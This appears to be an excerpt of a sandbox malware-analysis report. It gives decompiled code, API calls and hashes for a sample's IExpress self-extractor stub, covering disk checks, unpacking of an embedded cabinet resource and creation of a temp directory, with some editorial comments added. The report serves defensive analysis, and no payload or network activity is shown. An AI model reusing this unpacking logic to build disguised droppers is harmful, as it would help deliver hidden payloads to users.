                                                                                                                                                                                                                                      • Part of subcall function 0096597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009659AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-3708386018
                                                                                                                                                                                                                                    • Opcode ID: 545dab727a3fc8c237c380084f1b14710aede498e5b01a152b31486624855518
                                                                                                                                                                                                                                    • Instruction ID: 9b3556ff06f8e1b43608a307394e1e3aae1ef90250ffcb2b6291d0f5c638c913
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545dab727a3fc8c237c380084f1b14710aede498e5b01a152b31486624855518
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1814B70A08A049BDB20AB74CD95BFE72AD9FA1300F4500AAF586E3191DFB48DC1CE51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 324 96597d-9659b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 9659dd-965a1b GetDiskFreeSpaceA 324->325 326 9659bb-9659d8 call 9644b9 call 966285 324->326 328 965ba1-965bde memset call 966285 GetLastError FormatMessageA 325->328 329 965a21-965a4a MulDiv 325->329 341 965c05-965c14 call 966ce0 326->341 338 965be3-965bfc call 9644b9 SetCurrentDirectoryA 328->338 329->328 332 965a50-965a6c GetVolumeInformationA 329->332 335 965ab5-965aca SetCurrentDirectoryA 332->335 336 965a6e-965ab0 memset call 966285 GetLastError FormatMessageA 332->336 340 965acc-965ad1 335->340 336->338 353 965c02 338->353 344 965ae2-965ae4 340->344 345 965ad3-965ad8 340->345 346 965ae6 344->346 347 965ae7-965af8 344->347 345->344 349 965ada-965ae0 345->349 346->347 352 965af9-965afb 347->352 349->340 349->344 354 965b05-965b08 352->354 355 965afd-965b03 352->355 356 965c04 353->356 357 965b20-965b27 354->357 358 965b0a-965b1b call 9644b9 354->358 355->352 355->354 356->341 360 965b52-965b5b 357->360 361 965b29-965b33 357->361 358->353 364 965b62-965b6d 360->364 361->360 363 965b35-965b50 361->363 363->364 365 965b76-965b7d 364->365 366 965b6f-965b74 364->366 368 965b83 365->368 369 965b7f-965b81 365->369 367 965b85 366->367 370 965b96-965b9f 367->370 371 965b87-965b94 call 96268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E0096597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                                                    				_t46 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                    						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                    						 *0x969124 = E00966285();
                                                                                                                                                                                                                                    						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                    						_t110 = 0x4b0;
                                                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						E009644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                    					_v812 = _t69;
                                                                                                                                                                                                                                    					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                    					__eflags = _t116;
                                                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 = *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							*_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						*_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags = *0x969a34 & 0x00000008;
							if((*0x969a34 & 0x00000008) == 0) {
								L20:
								_t103 = *0x969a38; // 0x0
								_t110 = *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									*0x969124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0096268B(_a4, _t110, _t103, &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 = *0x969a38; // 0x0
							_t110 = *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4)) + *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) + *0x969a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E009644B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset(&_v788, 0, 0x200);
					*0x969124 = E00966285();
					FormatMessageA(0x1000, 0, GetLastError(), 0, &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E009644B9(0, 0x4bc, 0, 0, 0x10, 0);
					*0x969124 = E00966285();
					_t66 = 0;
					L33:
					return E00966CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ad3
                                                                                                                                                                                                                                    0x00965ad6
                                                                                                                                                                                                                                    0x00965ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ada
                                                                                                                                                                                                                                    0x00965adc
                                                                                                                                                                                                                                    0x00965add
                                                                                                                                                                                                                                    0x00965add
                                                                                                                                                                                                                                    0x00965ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ae0
                                                                                                                                                                                                                                    0x00965ae2
                                                                                                                                                                                                                                    0x00965ae4
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae9
                                                                                                                                                                                                                                    0x00965aeb
                                                                                                                                                                                                                                    0x00965af0
                                                                                                                                                                                                                                    0x00965af6
                                                                                                                                                                                                                                    0x00965af8
                                                                                                                                                                                                                                    0x00965af9
                                                                                                                                                                                                                                    0x00965af9
                                                                                                                                                                                                                                    0x00965afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965afd
                                                                                                                                                                                                                                    0x00965aff
                                                                                                                                                                                                                                    0x00965b00
                                                                                                                                                                                                                                    0x00965b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b03
                                                                                                                                                                                                                                    0x00965b05
                                                                                                                                                                                                                                    0x00965b08
                                                                                                                                                                                                                                    0x00965b20
                                                                                                                                                                                                                                    0x00965b27
                                                                                                                                                                                                                                    0x00965b52
                                                                                                                                                                                                                                    0x00965b52
                                                                                                                                                                                                                                    0x00965b5b
                                                                                                                                                                                                                                    0x00965b62
                                                                                                                                                                                                                                    0x00965b6b
                                                                                                                                                                                                                                    0x00965b6d
                                                                                                                                                                                                                                    0x00965b76
                                                                                                                                                                                                                                    0x00965b7d
                                                                                                                                                                                                                                    0x00965b83
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b6f
                                                                                                                                                                                                                                    0x00965b72
                                                                                                                                                                                                                                    0x00965b72
                                                                                                                                                                                                                                    0x00965b85
                                                                                                                                                                                                                                    0x00965b98
                                                                                                                                                                                                                                    0x00965b9e
                                                                                                                                                                                                                                    0x00965b87
                                                                                                                                                                                                                                    0x00965b8f
                                                                                                                                                                                                                                    0x00965b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b85
                                                                                                                                                                                                                                    0x00965b29
                                                                                                                                                                                                                                    0x00965b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b35
                                                                                                                                                                                                                                    0x00965b48
                                                                                                                                                                                                                                    0x00965b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b4a
                                                                                                                                                                                                                                    0x00965b0f
                                                                                                                                                                                                                                    0x00965b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b16
                                                                                                                                                                                                                                    0x00965a7c
                                                                                                                                                                                                                                    0x00965a8a
                                                                                                                                                                                                                                    0x00965aa5
                                                                                                                                                                                                                                    0x00965aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009659bb
                                                                                                                                                                                                                                    0x009659c0
                                                                                                                                                                                                                                    0x009659c7
                                                                                                                                                                                                                                    0x009659d1
                                                                                                                                                                                                                                    0x009659d6
                                                                                                                                                                                                                                    0x00965c05
                                                                                                                                                                                                                                    0x00965c14
                                                                                                                                                                                                                                    0x00965c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009659A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 009659AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00965A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00965A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00965A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00965A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00965A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00965AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00965BFC
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: d5591081b6b5217434b24c51992bc7c30f4c474573d916c12e36f29a3861c3bf
• Instruction ID: 4c44cdbd49a60ed6a9e66f6a7b4a45f21a9b65d7d4203164a7828085302ea9fd
• Opcode Fuzzy Hash: d5591081b6b5217434b24c51992bc7c30f4c474573d916c12e36f29a3861c3bf
• Instruction Fuzzy Hash: 3671CEB191420CAFEB259F60CC85FFB77ACEB89344F5545AEF446E2140EA749E849F20
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 374 964fe0-96501a call 96468f FindResourceA LoadResource LockResource 377 965020-965027 374->377 378 965161-965163 374->378 379 965057-96505e call 964efd 377->379 380 965029-965051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 965060-965077 call 9644b9 379->383 384 96507c-9650b4 379->384 380->379 388 965107-96510e 383->388 389 9650b6-9650da 384->389 390 9650e8-965104 call 9644b9 384->390 392 965110-965117 FreeResource 388->392 393 96511d-96511f 388->393 398 965106 389->398 402 9650dc 389->402 390->398 392->393 395 965121-965127 393->395 396 96513a-965141 393->396 395->396 399 965129-965135 call 9644b9 395->399 400 965143-96514a 396->400 401 96515f 396->401 398->388 399->396 400->401 404 96514c-965159 SendMessageA 400->404 401->378 405 9650e3-9650e6 402->405 404->401 405->390 405->398
C-Code - Quality: 77%
			// Decompiler output with editor annotations. The routine pulls the embedded cabinet out of the
			// RT_RCDATA resource "CABINET" and unpacks it in memory through cabinet.dll's FDI API, the
			// layout used by Microsoft IExpress (wextract) self-extractor stubs. The ordinal and constant
			// identifications below are inferred from the argument shapes, not recovered from symbols.
			E00964FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x969144 = E0096468F(_t36, 0, 0);
				// 0xa is RT_RCDATA: locate the raw cabinet in the resource section and lock it in memory
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x969140 = _t8; // global holding the pointer to the in-memory cabinet
				if(_t8 == 0) {
					return _t8; // no CABINET resource: fail with 0
				}
				_t9 =  *0x968584; // 0x0 (main dialog HWND)
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0); // SW_HIDE
					ShowWindow(GetDlgItem( *0x968584, 0x841), 5); // executed; SW_SHOW
				}
				_t10 = E00964EFD(0, 0); // executed
				if(_t10 != 0) {
					// cabinet.dll ordinal 20 = FDICreate(pfnalloc, pfnfree, pfnopen, pfnread, pfnwrite,
					// pfnclose, pfnseek, cpuType, perf): the seven E00964xxx arguments are the memory and
					// I/O callbacks that serve the locked resource, 0x969148 is the ERF error record, and
					// the trailing _t33 is a decompiler artefact (EDI carried through the call)
					__imp__#20(E00964CA0, E00964CC0, E00964980, E00964A50, E00964AD0, E00964B60, E00964BC0, 1, 0x969148, _t33);
					_t34 = _t10; // HFDI context, 0 on failure
					if(_t34 == 0) {
						L8:
						// failure path: the FDI error code read from the ERF is turned into a string-resource
						// ID (0x514 + erfOper) and shown; 0x10 is MB_ICONERROR, so E009644B9 appears to be a
						// MessageBox wrapper keyed by string-resource ID
						_t29 =  *0x969148; // 0x0
						_t24 =  *0x968584; // 0x0
						E009644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					// ordinal 22 = FDICopy(hfdi, pszCabinet, pszCabPath, flags, pfnfdin, pfnfdid, pvUser): the
					// pseudo-name "*MEMCAB" makes the open callback serve the locked resource (pvUser points
					// at the global 0x969140) instead of a file; E00964CD0 is the PFNFDINOTIFY callback that
					// creates the extracted members on disk
					__imp__#22(_t34, "*MEMCAB", 0x961140, 0, E00964CD0, 0, 0x969140); // executed
					_t37 = _t10; // nonzero when every member was extracted
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed; ordinal 23 = FDIDestroy
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					// E00964EFD failed before any extraction: report string-resource 0x4ba
					_t27 =  *0x968584; // 0x0
					E009644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x969140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12); // release the locked cabinet
						 *0x969140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x9691d8; // 0x0
						if(_t47 == 0) {
							E009644B9(0, 0x4f8, 0, 0, 0x10, 0); // further error notice (string-resource 0x4f8) unless 0x9691d8 is set
						}
					}
					// two flag words gate the UI; when both bits are clear the result is posted to the dialog
					// with a private message (0xfa1)
					if(( *0x968a38 & 0x00000001) == 0 && ( *0x969a34 & 0x00000001) == 0) {
						SendMessageA( *0x968584, 0xfa1, _t37, 0);
					}
					return _t37; // nonzero == cabinet extracted
				}
			}
[Address column for the listing above: 0x00964fe0 to 0x00965163, one entry per decompiled statement]
                                                                                                                                                                                                                                    0x00965159
                                                                                                                                                                                                                                    0x00965159
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096515f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00964FFE
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00965006
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0096500D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00965030
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00965037
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0096504A
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00965051
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00965111
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00965159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: eb2e17529368bd49dcff0bc03a603f7a2830115d4e5b63ebc43d1901d8497006
                                                                                                                                                                                                                                    • Instruction ID: ac6ebd2dc12cef18a47aa3e2e4e25464aa70935bf1080cedf932ff543839e2b1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2e17529368bd49dcff0bc03a603f7a2830115d4e5b63ebc43d1901d8497006
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8310DB075C3017FD7205BA1AD89F67369CB787B49F06001CF902F21A1DAF5CC40AA55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 95%
E009653A1(CHAR* __ecx, CHAR* __edx) {
    // Decompiler output as shown in the report; the comments are editorial.
    // __ecx = base directory, __edx = output buffer (0x104 = MAX_PATH bytes) that
    // receives the path of the working directory this function creates.
    signed int _v8;
    char _v268;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t5;
    long _t13;
    int _t14;
    CHAR* _t20;
    int _t29;
    int _t30;
    CHAR* _t32;
    signed int _t33;
    void* _t34;

    _t5 =  *0x968004; // 0xf4cc89a0   -- /GS stack cookie; _v8 = cookie ^ esp is checked in the epilogue
    _v8 = _t5 ^ _t33;
    _t32 = __edx;
    _t20 = __ecx;
    _t29 = 0;                                    // sequence number n for IXPnnn.TMP
    while(1) {
        // bounded sprintf (inferred from the arguments): _v268 = "IXP%03d.TMP" formatted with n
        E0096171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
        _t34 = _t34 + 0x10;                      // caller-side stack cleanup after the cdecl call (decompiler artifact)
        _t29 = _t29 + 1;
        E00961680(_t32, 0x104, _t20);            // bounded copy of the base directory into the output buffer (inferred)
        E0096658A(_t32, 0x104,  &_v268); // executed   -- append "IXPnnn.TMP" to that path (inferred)
        RemoveDirectoryA(_t32); // executed             -- removes a stale directory of that name if it is empty
        _t13 = GetFileAttributesA(_t32); // executed
        if(_t13 == 0xffffffff) {                 // INVALID_FILE_ATTRIBUTES: nothing is in the way, use this name
            break;
        }
        if(_t29 < 0x190) {                       // try up to 400 sequential names (IXP000.TMP .. IXP399.TMP)
            continue;
        }
        L3:
        // Fallback: let GetTempFileNameA pick a unique "IXP<hex>.TMP" name in the base
        // directory, then replace the file it creates with a directory of the same name.
        _t30 = 0;
        if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
            _t30 = 1;
            DeleteFileA(_t32);
            CreateDirectoryA(_t32, 0);
        }
        L5:
        return E00966CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32); // stack-cookie check epilogue; result is _t30 (1 = directory created)
    }
    _t14 = CreateDirectoryA(_t32, 0); // executed
    if(_t14 == 0) {
        goto L3;                                 // creation failed: fall back to GetTempFileNameA naming
    }
    _t30 = 1;
     *0x968a20 = 1;                              // global flag: a sequential IXPnnn.TMP directory was created
    goto L5;
}

Address column for the E009653A1 listing above (one entry per statement, in order; 0x00000000 = no address mapped): 0x009653ac, 0x009653b3, 0x009653b9, 0x009653bb, 0x009653bd, 0x009653bf, 0x009653d1, 0x009653d6, 0x009653e0, 0x009653e2, 0x009653f5, 0x009653fb, 0x00965402, 0x0096540b, 0x00000000, 0x00000000, 0x00965413, 0x00000000, 0x00000000, 0x00965415, 0x00965416, 0x00965427, 0x0096542a, 0x0096542b, 0x00965434, 0x00965434, 0x0096543a, 0x0096544c
                                                                                                                                                                                                                                    0x0096544c
                                                                                                                                                                                                                                    0x00965452
                                                                                                                                                                                                                                    0x0096545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096545e
                                                                                                                                                                                                                                    0x0096545f
                                                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009653FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096542B
